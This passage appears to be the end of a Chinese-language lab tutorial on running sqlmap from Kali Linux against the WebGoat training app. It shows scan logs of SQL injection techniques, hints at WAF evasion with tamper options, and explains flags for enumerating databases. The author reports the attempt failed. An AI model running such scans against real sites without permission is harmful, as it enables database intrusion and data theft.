[02:33:00] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:33:00] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:33:00] [INFO] testing 'Oracle error-based - Parameter replace'
[02:33:00] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:33:00] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:33:00] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:33:00] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:33:00] [INFO] testing 'Generic inline queries'
[02:33:00] [INFO] testing 'MySQL inline queries'
[02:33:00] [INFO] testing 'PostgreSQL inline queries'
[02:33:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:33:00] [INFO] testing 'Oracle inline queries'
[02:33:00] [INFO] testing 'SQLite inline queries'
[02:33:00] [INFO] testing 'Firebird inline queries'
[02:33:00] [INFO] testing 'ClickHouse inline queries'
[02:33:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:33:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:33:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:33:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:33:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:33:00] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:33:01] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:33:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:33:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:33:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:33:01] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:33:01] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:33:01] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:33:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:33:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:33:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:33:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:33:02] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:33:02] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:33:02] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:33:02] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:33:02] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:33:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:33:03] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:33:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:33:03] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:33:03] [INFO] testing 'Oracle AND time-based blind'
[02:33:03] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:33:03] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:33:04] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:33:04] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:33:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:33:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:33:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:33:04] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:33:04] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:33:04] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:33:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:33:04] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:33:04] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:33:04] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:33:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:33:05] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:33:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:33:05] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:33:05] [WARNING] parameter 'Referer' does not seem to be injectable
[02:33:05] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 02:33:05 /2025-05-12/
┌──(kali㉿kali)-[~]
└─$
|
參數說明:
- -u:目標網址
- --batch:自動接受所有預設選項(不互動)
- --level=3、--risk=2:提高測試深度(有些漏洞需要這些設定才能被觸發)
- --dbs:列出所有資料庫名稱
Step 3:選擇資料庫、列出資料表
若上一步成功,會看到類似:
[INFO] the back-end DBMS is MySQL
[INFO] available databases [2]:
[*] information_schema
[*] webgoat
實際上 WebGoat 2025.3 似乎無法成功,無法繼續下去。
(完)
相關
